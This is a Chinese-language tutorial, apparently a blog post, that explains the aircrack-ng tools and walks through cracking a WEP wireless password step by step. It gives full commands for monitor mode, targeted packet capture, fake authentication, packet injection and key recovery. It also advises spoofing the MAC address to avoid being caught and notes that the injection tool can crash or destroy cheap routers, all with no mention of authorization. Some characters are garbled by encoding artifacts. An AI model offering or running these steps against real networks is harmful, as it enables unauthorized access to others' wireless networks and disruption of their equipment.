安裝:$sudo apt-get install aircrack-ng Aircrack-ng無線破解工具包有很多工具,用到的工具主要有以下幾個: airmon-ng 處理網(wǎng)卡工作模式 airodump-ng 抓包 aircrack-ng 破解 aireplay-ng 發(fā)包,干擾 1) airmon-ng 啟動無線網(wǎng)卡進入 Monitor 模式, useage: airmon-ng <start|stop|check> <interface> [channel] <start|stop|check>:啟動,停止,檢測 <interface>:指定無線網(wǎng)卡 [channel]:監(jiān)聽頻道,現(xiàn)代大多數(shù)無線路由默認是 6,隨便掃描一下都是這個頻道,網(wǎng)管們應(yīng)該換換了 2) airodump-ng 抓包工具,我最喜歡用的,詳細用法如下: usage: airodump-ng <options> <interface>[,<interface>,...] Options: –ivs :僅將抓取信息保存為 .ivs –write <prefix> :保存為指定日文件名,我一般用這個,尤其是多個網(wǎng)絡(luò)時,指定了也好區(qū)分 –beacons :保存所有的 beacons ,默認情況況下是丟棄那些無用的數(shù)據(jù)包的 Filter options:–encrypt <suite> : 使用密碼序列過濾 AP –netmask <netmask> : 使用掩碼過濾 AP –bssid <bssid> : 使用 bssid 過濾 AP -a : 過濾無關(guān)的客戶端 –help : 顯示使用方法,翻譯到這里,感覺還是英文的貼切一點,建議讀原文3)aireplay-ng 搞破壞的工具,注意殺傷力很大,甚至可以損壞劣質(zhì)的 AP 設(shè)備(小內(nèi)存的路由器可能會重啟,或者徹底被破壞掉),我很喜歡這個東西,相信你也會喜歡的,使用時注意分寸. usage: aireplay-ng <options> <replay interface> Filter options: -b bssid : AP的 MAC -d dmac:目標的 MAC -s smac :來源的 MAC -m len: 最小包長度 -n len: 最大包長度 -D: 禁用 AP 發(fā)現(xiàn)功能 Replay options: -x nbpps : 每秒包數(shù)量 -p fctrl : 框架設(shè)定 (hex) -a bssid : 設(shè)置AP的 mac -c dmac: 設(shè)置目標的 MAC -h smac: 設(shè)置來源的 mac -g value : 改變環(huán)緩存大小 (默認8) Fakeauth attack options: -e essid : 設(shè)置目標 AP 的 SSID -o npckts : 每秒爆破的包數(shù)量 (0 自動, 默認 1) -q sec: 存活時間 秒 -y prga: 共享可信的 key流 –help : 顯示這個幫助,這部分是全部依照我的使用來翻譯,沒有完全準確的翻譯,主要對付 那些不給出作者就引用的人,鄙視抄襲.4)aircrack-ng 破解KEY,漫長的過程.漫不漫長取決于兩個方面: 一是網(wǎng)管的聰明程度(能否設(shè)置出復(fù)雜的密碼),二是電腦的速度. usage: aircrack-ng [options] <.cap / .ivs file(s)> Common options: -a <amode> : 暴破 (1/WEP, 2/WPA-PSK) -e <essid> : 選擇 essid 為目標 -b <bssid> : 選擇 ap的 mac 為目標,就是破解識別的關(guān)鍵字 -q : 使用安靜模式,無數(shù)出模式 -C <macs> : 將所有的 AP 合并為一個虛擬的 –help: 顯示這個幫助 就WEP破解說明,步驟: 步驟: 1. 修改無線網(wǎng)卡狀態(tài):先 down 掉 2. 偽造無線網(wǎng)卡的 MAC 地址:安全起見,減少被抓到的可能 3. 修改網(wǎng)卡工作模式:進入Monitor狀態(tài),會產(chǎn)生一個虛擬的網(wǎng)卡 4. 修改無線網(wǎng)卡狀態(tài): up 5. 查看網(wǎng)絡(luò)狀態(tài),記錄下 AP 的 MAC 和本機的 MAC ,確定攻擊目標 6. 監(jiān)聽抓包:生成 .cap 或 .ivs 7. 干擾無線網(wǎng)絡(luò):截取無線數(shù)據(jù)包,發(fā)送垃圾數(shù)據(jù)包,用來獲得更多的有效數(shù)據(jù)包 8. 破解 .cap 或 .ivs ,獲得 WEP 密碼,完成破解 前面如何偽造網(wǎng)卡不在敘述,可參見這篇文章:http://www.path8.net/tn/archives/40 具體步驟: 1、首先確定是否有wlan0的無線網(wǎng)卡端口,ifconfig即可知道。若存在終端輸入 sudo airmon-ng start wlan0 啟動無線 網(wǎng)卡 的監(jiān)控模式。 ![]() 2、在終端中輸入 sudo airodump -ng mon0 ,啟動監(jiān)控模式后無線端口是mon0(如果啟動多次會按數(shù)字累加), 看看有哪些采用wep 加密的AP在線,然后按 ctrl+c 退出,保留終端。 ![]() 3、 另開一個終端,輸入 sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0 (-c后面的6為AP工作頻道,--bissid后面的AP's MAC 是要欲破解AP的MAC地址,-w后的wep的是抓下來的數(shù)據(jù)包DATA 保存的文件名(可以隨便取名),然后回車開始抓包。 ![]() (后來補上去的一張圖,所以時間不對:)) 4、再另開一個終端,輸入 sudo aireplay-ng -1 0 -e ESSID -a AP's MAC -h My MAC mon0 與AP建立虛擬連接 (-h后面跟著的My MAC 是自己的無線網(wǎng)卡的MAC地址) ![]() 這里以之前探測到的ESSID為P2P的為例。 5、建立虛擬連接成功后,輸入sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 進行注入,現(xiàn)在步驟3中數(shù)據(jù)包應(yīng)該不斷增長。 ![]() 6、收集有5000個以上的DATA之后,另開一個終端,輸入 sudo aircrack-ng wep*.cap 進行解密 (如果沒算出來的話,繼續(xù)等,Ubuntu aircrack-ng會在DATA每增加多5000個之后就自動再運行 ,直到算出密碼為至) ![]() 7、破解出密碼后在終端中輸入 sudo airmon-ng stop mon0 關(guān)閉監(jiān)控模式,不然無線網(wǎng)卡會一直向剛剛的AP進行注入的,用ctrl+c退出或者直接關(guān)閉終端都是不行的,除非重新啟動電腦。 ![]() 8、如果沒有出現(xiàn)意外,你應(yīng)該會很高興的看到KEY FOUND! |